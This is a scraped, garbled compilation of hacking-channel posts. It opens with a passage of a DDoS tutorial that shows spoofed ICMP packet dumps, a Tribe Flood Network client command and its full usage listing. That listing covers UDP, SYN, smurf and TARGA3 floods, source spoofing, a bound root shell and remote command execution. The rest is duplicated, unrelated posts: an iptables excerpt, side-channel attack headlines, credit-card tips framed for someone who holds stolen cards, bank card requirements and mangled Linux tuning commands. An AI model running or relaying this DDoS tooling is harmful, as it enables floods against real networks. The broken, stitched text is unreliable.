0x0000 4500 005c 659d 0000 0001 d22e 172b ab00 E..e ..... + ..
0x0010 c0a8 0002 0800 f7ff 0000 0000 0000 0000 ........... .....
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0050 0000 ..
08: 03: 36.524933 192.168.0.5> 23.43.171.0: icmp: echo reply
0x0000 4500 005c a5d5 0000 4001 51f6 c0a8 0002 E ... @. Q .....
0x0010 172b ab00 0000 ffff 0000 0000 0000 0000. + ..............
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0050 0000 ..
08 : 03: 36.524944 36.235.130.0> 192.168.0.5: icmp: echo request [ttl 0]
0x0000 4500 005c 659d 0000 0001 ed6e 24eb 8200 E..e ... n $ ...
0x0010 c0a8 0002 0800 f7ff 0000 0000 0000 0000 ......
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0050 0000 ..
08: 03: 36.524984 192.168.0.5> 36.235.130.0: icmp: echo reply
0x0000 4500 005c 551c 0000 4001 bdef c0a8 0002 E..U ... @ .......
0x0010 24eb 8200 0000 ffff 0000 0000 0000 0000 $ ..................
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ......
γ
γγ[root @ master root ] ./ tfn -f host.txt -c 0 Stop attack
γγγγProtocol: random
γγγγSource IP: random
γγγγClient input: list
γγγγCommand: stop flooding
Password verification:
Sending out packets: ...
γγOf course, there are other attack methods. You can change the attack method by using -c X.
γ [root @ master root ] ./ tfn
γγ usage: ./tfn
[-P protocol] Protocol for server communication. Can be ICMP, UDP or TCP.
γγγγγγγγUses a random protocol as default
[-D n] Send out n bogus requests for each real one to decoy targets
[-S host / ip] Specify your source IP. Randomly spoofed by default, you need
γγγγγγγγto use your real IP if you are behind spoof-filtering routers
[-f hostlist] Filename containing a list of hosts with TFN servers to contact
[-h hostname] To contact only a single host running a TFN server
[-i target string] Contains options / targets separated by '@', see below
[-p port] A TCP destination port can be specified for SYN floods
<- c command ID> 0-Halt all current floods on server (s) immediately
γγγγγγγγ1-Change IP antispoof-level (evade rfc2267 filtering)
γγγγγγγγγγusage: -i 0 (fully spoofed) to -i 3 (/ 24 host bytes spoofed)
γγγγγγγγ2- Change Packet size, usage: -i
γγγγγγγγ3-Bind root shell to a port, usage: -i
γγγγγγγγ4-UDP flood, usage: -i victim @ victim2 @ victim3 @ ...
γγγγγγγγ5-TCP / SYN flood, usage: -i victim @ ... [-p destination port]
γγγγγγγγ6-ICMP / PING flood, usage: -i victim @ ...
γγγγγγγγ7-ICMP / SMURF flood, usage: -i victim @ broadcast @ broadcast2 @ ...
γγγγγγγγ8-MIX flood (UDP / TCP / ICMP interchanged), usage: -i victim @ ...
γγγγγγγγ9-TARGA3 flood (IP stack penetration ), Usage: -i victim @ ...
γγγγγγγγ10 - blindly the Execute Remote shell the Command, the Command Usage -i
four defensive approach.
γγLike the internet, like all presentations DDOS article, DDOS hard to detect, I try to filter out all icmp packet firewall, To protect my mainframe, but what I realized was that my mainframe crashed later. Hey ~, do nβt expect me to guard against DDOS, if I can guard against it, I do nβt have to sleep: (
γγstill the old saying, we can do What we do is to try our best not to make our host a proxy for others to attack, and to strictly restrict the intranet intranet travel, try not to harm others, as long as everyone does this, our network environment can be safer, at least, I You can sleep peacefully for a few days.
γγAttach a part of my firewall. It is mainly for ICMP / PING, but it is not very useful: (
/ sbin / iptables -P INPUT DROP
/ sbin / iptables -A INPUT -i lo -p all -j ACCEPT
/ sbin / iptabl es -A INPUT -i eth1 -p icmp -j ACCEPT
/ sbin / iptables -A INPUT -p icmp --icmp-type 8 -j DROP
/ sbin / iptables -A INPUT -s 127.0.0.2 -i lo -j ACCEPT
/ sbin / iptables -A INPUT -s 127.0.0.2- i eth0 -j DROP
/ sbin / iptables -A INPUT -s $ LAN_NET / 24 -i eth0 -j DROP
/ sbin / iptables -A INPUT -s 172.16.0.0/12 -i eth0 -j DROP
/ sbin / iptables -A -j -i eth0 -s 10.0.0.0/8 the INPUT the DROP
/ sbin / iptables -A limit the INPUT -i eth0 -m --limit. 1 / sec
--limit-Burst. 5 -j ACCEPT / sbin / iptables -A the INPUT
- i eth0 -p udp -m state --state NEW -j REJECT
/ sbin / iptables -A INPUT -p tcp --dport 22 -j ACCEPT
/ sbin / iptables -A INPUT -p tcp --dport 80 -j ACCEPT
/ sbin / iptables -A INPUT -p tcp -i eth1 --dport 53 -j ACCEPT
/ sbin / iptables -A INPUT -p udp -i eth1 --dport 53 -j ACCEPT
/ sbin / iptables -A INPUT -p tcp -i eth0 -m state
--state ESTABLISHED, RELATED -m tcp --dport 1024: -j ACCEPT
/ sbin / iptables -A INPUT -p udp -i eth0 -m state
--state ESTABLISHED, RELATED -m udp --dport 1024: -j ACCEPT
/ sbin / iptables -A INPUT -p icmp --icmp- type echo-request
-j LOG --log-level 2
/ sbin / iptables -A INPUT -i eth0 -p icmp --icmp-type
echo-request -j DROP
/ sbin / iptables -A INPUT -p tcp -m multiport
--destination-port 135,137,138,139 -j LOG
/ sbin / iptables -A INPUT -p udp -m multiport
--destination-port 135,137,138,139 -j LOG
/ sbin / iptables -A INPUT -i eth0 -p tcp --dport 2000 -j ACCEPT
/ sbin / iptables -A INPUT -i eth0 -p tcp --dport 2001 -j ACCEPT
/ sbin / iptables -A INPUT -p tcp -i eth1 -m state --state
ESTABLISHED, RELATED -m tcp --dport 1024: -j ACCEPT The
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
/ sbin / iptables -A INPUT -i lo -p all -j ACCEPT
/ sbin / iptabl es -A INPUT -i eth1 -p icmp -j ACCEPT
/ sbin / iptables -A INPUT -p icmp --icmp-type 8 -j DROP
/ sbin / iptables -A INPUT -s 127.0.0.2 -i lo -j ACCEPT
/ sbin / iptables -A INPUT -s 127.0.0.2- i eth0 -j DROP
/ sbin / iptables -A INPUT -s $ LAN_NET / 24 -i eth0 -j DROP
/ sbin / iptables -A INPUT -s 172.16.0.0/12 -i eth0 -j DROP
/ sbin / iptables -A -j -i eth0 -s 10.0.0.0/8 the INPUT the DROP
/ sbin / iptables -A limit the INPUT -i eth0 -m --limit. 1 / sec
--limit-Burst. 5 -j ACCEPT / sbin / iptables -A the INPUT
- i eth0 -p udp -m state --state NEW -j REJECT
/ sbin / iptables -A INPUT -p tcp --dport 22 -j ACCEPT
/ sbin / iptables -A INPUT -p tcp --dport 80 -j ACCEPT
/ sbin / iptables -A INPUT -p tcp -i eth1 --dport 53 -j ACCEPT
/ sbin / iptables -A INPUT -p udp -i eth1 --dport 53 -j ACCEPT
/ sbin / iptables -A INPUT -p tcp -i eth0 -m state
--state ESTABLISHED, RELATED -m tcp --dport 1024: -j ACCEPT
/ sbin / iptables -A INPUT -p udp -i eth0 -m state
--state ESTABLISHED, RELATED -m udp --dport 1024: -j ACCEPT
/ sbin / iptables -A INPUT -p icmp --icmp- type echo-request
-j LOG --log-level 2
/ sbin / iptables -A INPUT -i eth0 -p icmp --icmp-type
echo-request -j DROP
/ sbin / iptables -A INPUT -p tcp -m multiport
--destination-port 135,137,138,139 -j LOG
/ sbin / iptables -A INPUT -p udp -m multiport
--destination-port 135,137,138,139 -j LOG
/ sbin / iptables -A INPUT -i eth0 -p tcp --dport 2000 -j ACCEPT
/ sbin / iptables -A INPUT -i eth0 -p tcp --dport 2001 -j ACCEPT
/ sbin / iptables -A INPUT -p tcp -i eth1 -m state --state
ESTABLISHED, RELATED -m tcp --dport 1024: -j ACCEPT The
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ This full ddos tutorial, powered by deepweb
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ incredible hacking techniques BY UNDERCODE
twitter.com/UnderCodeNews
π¦ ππΌππ πππΈβπ :
1) Losing the "hand" will leak the password
> The temperature of the keyboard after the finger has been pressed will leak the password!
> SIM card hijacking makes your phone unable to make calls or access the Internet, and passwords of Google and FB accounts have also been tampered with
`` One finger '' ATM collection is convenient and safe! Japanese expert:
> Digital camera can interpret the finger vein map in 10 minutes by taking a photo of the palm
AI can generate fake fingerprints
2) "Hearing" powerful hacker attack
> "Dolphin Attack" technology can send sounds that are not received by human ears to smart voice assistants
> "Mosquito" (mosquito) proof-of-concept attack that uses a speaker or headset to transfer data from a networked or isolated computer
Control your current noise to `` listen '' to your screen
Speaker or headset can transfer computer data
3) Everything is horrible
Webcam at checkout counter, sneak shot of credit card information
Credit card information leaked, webcam fools when paying!
So fragile! Shouting computer system crashed
4) Crash! This can also be horrible
Even if you are not connected to the Internet, you can use the power line to transmit the changes in current to steal computer data.
Retreat practice! Hundreds of prisoners used the electronic system "JPay" loophole to jointly steal US $ 225,000 (about 6.89 million Taiwan dollars)
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ incredible hacking techniques BY UNDERCODE
twitter.com/UnderCodeNews
π¦ ππΌππ πππΈβπ :
1) Losing the "hand" will leak the password
> The temperature of the keyboard after the finger has been pressed will leak the password!
> SIM card hijacking makes your phone unable to make calls or access the Internet, and passwords of Google and FB accounts have also been tampered with
`` One finger '' ATM collection is convenient and safe! Japanese expert:
> Digital camera can interpret the finger vein map in 10 minutes by taking a photo of the palm
AI can generate fake fingerprints
2) "Hearing" powerful hacker attack
> "Dolphin Attack" technology can send sounds that are not received by human ears to smart voice assistants
> "Mosquito" (mosquito) proof-of-concept attack that uses a speaker or headset to transfer data from a networked or isolated computer
Control your current noise to `` listen '' to your screen
Speaker or headset can transfer computer data
3) Everything is horrible
Webcam at checkout counter, sneak shot of credit card information
Credit card information leaked, webcam fools when paying!
So fragile! Shouting computer system crashed
4) Crash! This can also be horrible
Even if you are not connected to the Internet, you can use the power line to transmit the changes in current to steal computer data.
Retreat practice! Hundreds of prisoners used the electronic system "JPay" loophole to jointly steal US $ 225,000 (about 6.89 million Taiwan dollars)
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Twitter
UNDERCODE TESTING (@UndercodeNews) | Twitter
The latest Tweets from UNDERCODE TESTING (@UndercodeNews). πΈππ§πππππ & πΈππ¨ππͺπ€ ππ‘πππ₯ππ. Lebanon-North
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Four bank card usage methods-some hacker can used after getting cc
t.me/UnderCodeTesting
π¦ ππΌππ πππΈβπ :
1) Multi-dimensional and multi-scenario consumption. Shopping in malls, supermarket consumption, restaurant meals, airport ticket purchases, etc. Multi-scenario consumption and multi-dimensional consumption are the preferred methods for banks to use cards.
2) Monthly credit card spending accounts for more than half of the credit card limit. Banks like this method of using cards. In this way, the card is used to show that the cardholder really needs to swipe the card. If this demand lasts for more than 3 months and there is no abnormal use of the card, the bank will basically give you an increase
3) often in installments, often withdraw cash. These two are the main sources of revenue for bank credit card centers. The installment fee, cash withdrawal interest and commission fee are all paid by the cardholder to the bank. If cardholders often have the need for instalments and cash withdrawals, which brings profits to the bank's credit card center, of course the bank likes to raise funds for you.
4) Repay on time. All the monthly repayments should be repayable, and there is no overdue behavior, indicating that cardholders will not bring bad debt risk to the bank, and the bank likes such quality customers.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Four bank card usage methods-some hacker can used after getting cc
t.me/UnderCodeTesting
π¦ ππΌππ πππΈβπ :
1) Multi-dimensional and multi-scenario consumption. Shopping in malls, supermarket consumption, restaurant meals, airport ticket purchases, etc. Multi-scenario consumption and multi-dimensional consumption are the preferred methods for banks to use cards.
2) Monthly credit card spending accounts for more than half of the credit card limit. Banks like this method of using cards. In this way, the card is used to show that the cardholder really needs to swipe the card. If this demand lasts for more than 3 months and there is no abnormal use of the card, the bank will basically give you an increase
3) often in installments, often withdraw cash. These two are the main sources of revenue for bank credit card centers. The installment fee, cash withdrawal interest and commission fee are all paid by the cardholder to the bank. If cardholders often have the need for instalments and cash withdrawals, which brings profits to the bank's credit card center, of course the bank likes to raise funds for you.
4) Repay on time. All the monthly repayments should be repayable, and there is no overdue behavior, indicating that cardholders will not bring bad debt risk to the bank, and the bank likes such quality customers.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to apply for ICBC Credit Card? What are the application requirements?
T.me/underCodeTesting
π¦ ππΌππ πππΈβπ :
There are three main requirements to apply for an ICBC credit card
γγLet me introduce you in detail below.
γγThe most important requirements for applying for an ICBC credit card are to meet the following three conditions:
γγ1. Age requirements: Generally a citizen who has reached the age of eighteen, you need to submit an identity document for certification.
γγ2. Stable repayment ability: Generally you are required to provide proof of work and income. In order to increase the application success rate and credit limit, it is generally recommended to provide proof of own real estate, proof of own vehicle, proof of bank assets, etc. The standards for issuing cards are different for each bank, depending on the bank requirements.
γγ3. The credit status is good: that is, you are required to have no bad credit history, and the bank will inquire on its own.
γγICBC Credit Card Master Card Processing Conditions
γγA natural person who is over 18 years of age and has full capacity for civil conduct, a work unit or a fixed residence where the card issuer is located, has a stable income and is above the local average level, and can apply for a peony credit card at any local ICBC business outlet. .
γγICBC Credit Card Gold Card Requirements
γγIf you want to apply for ICBC Gold Credit Card, in addition to meeting the above conditions, there are some other conditions.
γγ1.The applicant is a VIP customer of ICBC;
γγ2. The applicant's monthly income is over 10,000 and is very stable;
γγ3. At least four-star ICBC customers.
γγNote: If you choose βYesβ after you apply for a credit card under βUnable to approve the card grade, agree with the bank to automatically issue other grades of productsβ, then when the gold card is not approved, a general card may be issued for you.
γγIf the gold card application is unsuccessful, you are advised to use an ICBC credit card more often and repay it on the repayment date in order to gradually accumulate a good card record and lay a credit foundation for future gold card upgrades.
γγICBC Credit Card Online Application Conditions
γγ1.The conditions for the application of the main credit card of ICBC must be met;
γγ2.The resident city has ICBC business outlets;
γγ3.The city where the card is selected must be the place of your work unit or fixed residential address;
γγ4. Fill in the credit card online application information as required.
γγUnits apply for ICBC Peony Credit Card
γγAll party and government agencies, social organizations, enterprises and institutions that have an account opening permit issued by the People's Bank of China, open a basic deposit account or a general deposit account at an ICBC domestic branch, have legal personality, or are legally registered with relevant departments can apply Peony Unit Card (Business Card).
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to apply for ICBC Credit Card? What are the application requirements?
T.me/underCodeTesting
π¦ ππΌππ πππΈβπ :
There are three main requirements to apply for an ICBC credit card
γγLet me introduce you in detail below.
γγThe most important requirements for applying for an ICBC credit card are to meet the following three conditions:
γγ1. Age requirements: Generally a citizen who has reached the age of eighteen, you need to submit an identity document for certification.
γγ2. Stable repayment ability: Generally you are required to provide proof of work and income. In order to increase the application success rate and credit limit, it is generally recommended to provide proof of own real estate, proof of own vehicle, proof of bank assets, etc. The standards for issuing cards are different for each bank, depending on the bank requirements.
γγ3. The credit status is good: that is, you are required to have no bad credit history, and the bank will inquire on its own.
γγICBC Credit Card Master Card Processing Conditions
γγA natural person who is over 18 years of age and has full capacity for civil conduct, a work unit or a fixed residence where the card issuer is located, has a stable income and is above the local average level, and can apply for a peony credit card at any local ICBC business outlet. .
γγICBC Credit Card Gold Card Requirements
γγIf you want to apply for ICBC Gold Credit Card, in addition to meeting the above conditions, there are some other conditions.
γγ1.The applicant is a VIP customer of ICBC;
γγ2. The applicant's monthly income is over 10,000 and is very stable;
γγ3. At least four-star ICBC customers.
γγNote: If you choose βYesβ after you apply for a credit card under βUnable to approve the card grade, agree with the bank to automatically issue other grades of productsβ, then when the gold card is not approved, a general card may be issued for you.
γγIf the gold card application is unsuccessful, you are advised to use an ICBC credit card more often and repay it on the repayment date in order to gradually accumulate a good card record and lay a credit foundation for future gold card upgrades.
γγICBC Credit Card Online Application Conditions
γγ1.The conditions for the application of the main credit card of ICBC must be met;
γγ2.The resident city has ICBC business outlets;
γγ3.The city where the card is selected must be the place of your work unit or fixed residential address;
γγ4. Fill in the credit card online application information as required.
γγUnits apply for ICBC Peony Credit Card
γγAll party and government agencies, social organizations, enterprises and institutions that have an account opening permit issued by the People's Bank of China, open a basic deposit account or a general deposit account at an ICBC domestic branch, have legal personality, or are legally registered with relevant departments can apply Peony Unit Card (Business Card).
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Telegram
UNDERCODE TESTING OFFICIAL
π¦ WELCOME TO UNDERCODE TESTING FOR LEARN HACKING & PROGRAMMING & MORE...
π Άπ Έππ »π°π±
@UndercOdeTesting
ππΎππππ±π ΄
@UnderCodeTestingCompany
π ΅π°π ²π ΄π±πΎπΎπ Ί
@UndercOdeTesting
π Έπ ½πππ°π Άππ°π Ό
@UndercOdeTestingCompany
πππ Έπππ ΄π
@UnderCodeNews
π Άπ Έππ »π°π±
@UndercOdeTesting
ππΎππππ±π ΄
@UnderCodeTestingCompany
π ΅π°π ²π ΄π±πΎπΎπ Ί
@UndercOdeTesting
π Έπ ½πππ°π Άππ°π Ό
@UndercOdeTestingCompany
πππ Έπππ ΄π
@UnderCodeNews
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Speed Optimization-Use tmpfs to speed up your Linux server by undercode
twitter.com/UnderCodeNews
π¦ ππΌππ πππΈβπ :
> cache files today and learned a trick is to use the virtual disk to store squid and seesion of php. A lot faster!
1) The default system will load / dev / shm, which is the so-called tmpfs. Some people say it is different from ramdisk (virtual disk). Like a virtual disk, tmpfs can use your RAM, but it can also use your swap partition for storage. Moreover, the traditional virtual disk is a block device and requires a command such as mkfs to really use it. Tmpfs is a file system, not a block device; you just install it and it will work.
tmpfs has the following advantages:
The size of the dynamic file system;
2) Another major benefit of tmpfs is its lightning speed. Because a typical tmpfs file system resides entirely in RAM, reading and writing can be almost instantaneous;
3) tmpfs data is not retained after a restart, because virtual memory is inherently volatile. So it is necessary to do some scripts for operations such as loading and binding.
π¦ Okay, let βs talk about some road principles, everyone is annoying, let βs talk about my application :)
1) First, create a tmp folder in / dev / shm, and then bind it with the actual / tmp:
mkdir / dev / shm / tmp
chmod 1777 / dev / shm / tmp
mount --bind / dev / shm / tmp / tmp
2) Application example: 1. Squid cache directory settings
vi /etc/squid/squid.conf
Modify it to
cache_dir ufs / tmp 256 16 256
3) The first 256 here means using 256M memory, I think the method of using ramdisk is not as good Use tmpfs directly, at least without using mkfs each time, and can also change the size dynamically. / Tmp at
4) this time is actually dev / shm / tmp.
Then restart the service, ok, now all squid cache files are saved in the tmpfs file system, soon.
π¦ Optimization of PHP performance
1) For a website with a large number of visits to Apache + PHP, there may be many temporary files under tmp, such as seesion or some cache files, then you can save it to a tmpfs file.
2) The way to save the seesion is very simple, just modify php.ini. Since I have bound / dev / stm / tmp to / tmp, it is not necessary to rewrite. As for the cache file generated by the php program, it can only be changed by itself. Php program
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Speed Optimization-Use tmpfs to speed up your Linux server by undercode
twitter.com/UnderCodeNews
π¦ ππΌππ πππΈβπ :
> cache files today and learned a trick is to use the virtual disk to store squid and seesion of php. A lot faster!
1) The default system will load / dev / shm, which is the so-called tmpfs. Some people say it is different from ramdisk (virtual disk). Like a virtual disk, tmpfs can use your RAM, but it can also use your swap partition for storage. Moreover, the traditional virtual disk is a block device and requires a command such as mkfs to really use it. Tmpfs is a file system, not a block device; you just install it and it will work.
tmpfs has the following advantages:
The size of the dynamic file system;
2) Another major benefit of tmpfs is its lightning speed. Because a typical tmpfs file system resides entirely in RAM, reading and writing can be almost instantaneous;
3) tmpfs data is not retained after a restart, because virtual memory is inherently volatile. So it is necessary to do some scripts for operations such as loading and binding.
π¦ Okay, let βs talk about some road principles, everyone is annoying, let βs talk about my application :)
1) First, create a tmp folder in / dev / shm, and then bind it with the actual / tmp:
mkdir / dev / shm / tmp
chmod 1777 / dev / shm / tmp
mount --bind / dev / shm / tmp / tmp
2) Application example: 1. Squid cache directory settings
vi /etc/squid/squid.conf
Modify it to
cache_dir ufs / tmp 256 16 256
3) The first 256 here means using 256M memory, I think the method of using ramdisk is not as good Use tmpfs directly, at least without using mkfs each time, and can also change the size dynamically. / Tmp at
4) this time is actually dev / shm / tmp.
Then restart the service, ok, now all squid cache files are saved in the tmpfs file system, soon.
π¦ Optimization of PHP performance
1) For a website with a large number of visits to Apache + PHP, there may be many temporary files under tmp, such as seesion or some cache files, then you can save it to a tmpfs file.
2) The way to save the seesion is very simple, just modify php.ini. Since I have bound / dev / stm / tmp to / tmp, it is not necessary to rewrite. As for the cache file generated by the php program, it can only be changed by itself. Php program
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Twitter
UNDERCODE TESTING (@UndercodeNews) | Twitter
The latest Tweets from UNDERCODE TESTING (@UndercodeNews). πΈππ§πππππ & πΈππ¨ππͺπ€ ππ‘πππ₯ππ. Lebanon-North
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Speed ββOptimization-Linux System Speeding Notes full :
t.me/UnderCodeTesting
π¦ ππΌππ πππΈβπ :
A) 1) First, enable hard disk DMA support.
After the system is installed, the DMA of the hard disk is not turned on. My method is to
add / sbin / hdparm -d1 -c3 -m16 / dev / hda to the end of /etc/rc.d/rc.local After powering on, the DMA of the hard disk will be turned on, so there is no need to manually set it each time.
2) If your hard drive supports ATA33, you can add the -X66 parameter, ATA66 is -X68, like my hard drive is ATA66, then the complete parameter is / sbin / hdparm -d1 -X68 -c3 -m16 / dev / hda Tests show that before the DMA is turned on, the actual read efficiency is about 4.10 Mb per second. After the DMA is turned on, the actual read efficiency jumps to 20 Mb per second, which is about 5 times improvement.
Β§ Test without DMA
[root@firefly /root]# hdparm -d0 /dev/hda
/dev/hda:
setting using_dma to 0 (off)
using_dma = 0 (off)
[root@firefly /root]# hdparm -Tt /dev/hda
/dev/hda:
3) Timing buffer-cache reads: 128 MB in 2.75 seconds = 46.55 MB/sec
Timing buffered disk reads: 64 MB in 15.58 seconds = 4.11 MB/sec
[root@firefly /root]# hdparm -d1 -X68 -c3 -m16 /dev/hda
/dev/hda:
setting 32-bit I/O support flag to 3
setting multcount to 16
setting using_dma to 1 (on)
setting xfermode to 69 (UltraDMA mode5)
multcount = 16 (on)
I/O support = 3 (32-bit w/sync)
using_dma = 1 (on)
[root @ firefly / root] # hdparm -Tt / dev / hda / dev / hda:
Timing buffer-cache reads: 128 MB in 2.75 seconds = 46.55 MB / sec
Timing buffered disk reads: 64 MB in 3.20 seconds = 20.00 MB / sec
From the above data, we can see that whether the hard disk DMA is turned on has a great impact on the read efficiency.
π¦ B) 1) Shut down excess system services.
This is an old topic. Generally, when we are a desktop workstation, we only need to activate a few basic? Services. The others are not only useless, they will occupy system resources on the one hand, and there will be security on the other. Concerns, I usually only use it to connect to the Internet, play files, listen to music, and watch movies. Most of the time, it is only a client. There is really no need to activate the server service. Therefore, I only stay in Setup System Services. Download the following services, the rest are closed.
1. crond
2. network
3. syslogd
Really, believe me, as long as these four are enough!
C) Third, download Kernel and reprogram.
1) Kernel is installed by default for most computers. It is not optimized for your computer, so it looks bloated. Because Kernel directly controls everything in the computer, it has a great impact on system efficiency. .
2) My approach is: download the latest Kernel and reprogram, and directly program the hardware on my computer into Kernel. Do not make Modules. Do not program for those that are not needed. In this way, you can create a Kernel that is completely oriented to your environment. Use the power of your computer.
3) As for how Kernel is programmed? This is not my subject, you can go to CLDP and refer to the Chinese translation of KERNEL HOW-TO.
4) Fourth, reduce the number of virtual terminals.
5) The system default is six, which is the six of CTRL + ALT F1 ο½ F6. I turn off four of them, leaving only CTRL + ALT F1 ο½ F2, which saves about 4 Mbytes of memory, but in this case, X -Window will change from the original CTRL + ALT F7 to CTRL + ALT F3.
6) Modify / etc / inittab, add mingetty 3 to 6 all with # font size, and then issue the instruction #init q
7) Five, adjust the X-Windows environment- old win
π¦I am used to operating KDE, I am not familiar with GNOME, so the following are all for KDE Design, GNOME users, I think it should be almost the same!
1) The number of colors is set to 16 Bit, which has a very good effect. Besides the waste of resources, 24 Bit does not see any benefit.
2) Do not use screen savers.
3) Cancel the animation window function.
4) Try to use the same font.
5) Use Mozilla in your browser. Do not use Netscape.
6) Don't activate the sound server artd
π¦Speed ββOptimization-Linux System Speeding Notes full :
t.me/UnderCodeTesting
π¦ ππΌππ πππΈβπ :
A) 1) First, enable hard disk DMA support.
After the system is installed, the DMA of the hard disk is not turned on. My method is to
add / sbin / hdparm -d1 -c3 -m16 / dev / hda to the end of /etc/rc.d/rc.local After powering on, the DMA of the hard disk will be turned on, so there is no need to manually set it each time.
2) If your hard drive supports ATA33, you can add the -X66 parameter, ATA66 is -X68, like my hard drive is ATA66, then the complete parameter is / sbin / hdparm -d1 -X68 -c3 -m16 / dev / hda Tests show that before the DMA is turned on, the actual read efficiency is about 4.10 Mb per second. After the DMA is turned on, the actual read efficiency jumps to 20 Mb per second, which is about 5 times improvement.
Β§ Test without DMA
[root@firefly /root]# hdparm -d0 /dev/hda
/dev/hda:
setting using_dma to 0 (off)
using_dma = 0 (off)
[root@firefly /root]# hdparm -Tt /dev/hda
/dev/hda:
3) Timing buffer-cache reads: 128 MB in 2.75 seconds = 46.55 MB/sec
Timing buffered disk reads: 64 MB in 15.58 seconds = 4.11 MB/sec
[root@firefly /root]# hdparm -d1 -X68 -c3 -m16 /dev/hda
/dev/hda:
setting 32-bit I/O support flag to 3
setting multcount to 16
setting using_dma to 1 (on)
setting xfermode to 69 (UltraDMA mode5)
multcount = 16 (on)
I/O support = 3 (32-bit w/sync)
using_dma = 1 (on)
[root @ firefly / root] # hdparm -Tt / dev / hda / dev / hda:
Timing buffer-cache reads: 128 MB in 2.75 seconds = 46.55 MB / sec
Timing buffered disk reads: 64 MB in 3.20 seconds = 20.00 MB / sec
From the above data, we can see that whether the hard disk DMA is turned on has a great impact on the read efficiency.
π¦ B) 1) Shut down excess system services.
This is an old topic. Generally, when we are a desktop workstation, we only need to activate a few basic? Services. The others are not only useless, they will occupy system resources on the one hand, and there will be security on the other. Concerns, I usually only use it to connect to the Internet, play files, listen to music, and watch movies. Most of the time, it is only a client. There is really no need to activate the server service. Therefore, I only stay in Setup System Services. Download the following services, the rest are closed.
1. crond
2. network
3. syslogd
Really, believe me, as long as these four are enough!
C) Third, download Kernel and reprogram.
1) Kernel is installed by default for most computers. It is not optimized for your computer, so it looks bloated. Because Kernel directly controls everything in the computer, it has a great impact on system efficiency. .
2) My approach is: download the latest Kernel and reprogram, and directly program the hardware on my computer into Kernel. Do not make Modules. Do not program for those that are not needed. In this way, you can create a Kernel that is completely oriented to your environment. Use the power of your computer.
3) As for how Kernel is programmed? This is not my subject, you can go to CLDP and refer to the Chinese translation of KERNEL HOW-TO.
4) Fourth, reduce the number of virtual terminals.
5) The system default is six, which is the six of CTRL + ALT F1 ο½ F6. I turn off four of them, leaving only CTRL + ALT F1 ο½ F2, which saves about 4 Mbytes of memory, but in this case, X -Window will change from the original CTRL + ALT F7 to CTRL + ALT F3.
6) Modify / etc / inittab, add mingetty 3 to 6 all with # font size, and then issue the instruction #init q
7) Five, adjust the X-Windows environment- old win
π¦I am used to operating KDE, I am not familiar with GNOME, so the following are all for KDE Design, GNOME users, I think it should be almost the same!
1) The number of colors is set to 16 Bit, which has a very good effect. Besides the waste of resources, 24 Bit does not see any benefit.
2) Do not use screen savers.
3) Cancel the animation window function.
4) Try to use the same font.
5) Use Mozilla in your browser. Do not use Netscape.
6) Don't activate the sound server artd
π¦ Speed ββUp X by Managing Font Setting Before you complain that X is not running fast enough,
check the font settings first, which may be a major culprit affecting performance.
First look at the FontPath settings in the / etc / X11 / XF86Config-4 file, if it is
as follows:
Section "Files"
RgbPath "/ usr / X11R6 / lib / X11 / rgb"
# Multiple FontPath entries are allowed (they are concatenated together)
# By default, Mandrake 6.0 and later now use a font server independent of
# the X server to render fonts.
FontPath "unix /:-1"
EndSection
can refer to the font settings in the / etc / X11 / fs / config file Set the value, select a few font directories you like (all
are correct ) , for example, I set the following font directories directly:
Section "Files"
RgbPath "/ usr / X11R6 / lib / X11 / rgb"
# Multiple FontPath entries are allowed (they are concatenated together)
# By default, Mandrake 6.0 and later now use a font server independent of
# the X server to render fonts.
FontPath "/ usr / X11R6 / lib / X11 / fonts / misc: unscaled"
FontPath "/ usr / X11R6 / lib / X11 / fonts / 75dpi: unscaled"
FontPath "/ usr / X11R6 / lib / X11 / fonts / Type1"
FontPath "/ usr / X11R6 / lib / X11 / fonts / mdk: unscaled"
FontPath "/ usr / share / fonts / ttf / big5" After the
π¦ EndSection
modification, reactivate startx and feel the cotton.
1) The original FontPath "unix /:-1" provided fonts by the X Font Server.
Ordinary users are not harmed by it first, so you can consider waiting for familiarity with the X Font Server function before using it.
In this way, you can turn off xfs
ps: don't use the default boot directly into x-window during trial, if not, it will get stuck in x-window
ps: quoted from http://twopensource.org/~marr/xfont_tip.
html six, adjust the application priority.
2) Generally, when we use any program, its NICE value is 0, which means the CPU's use weight. If our commonly used programs have a higher priority, the natural efficiency will be better. The value of the priority is from -20 to 19. The smaller the number, the higher the priority, but it should be noted that the average user can only lower it. (0 ~ 19), only root has the right to increase the priority (-20 ~ 19). We can use ps -fel to observe the NI column to know.
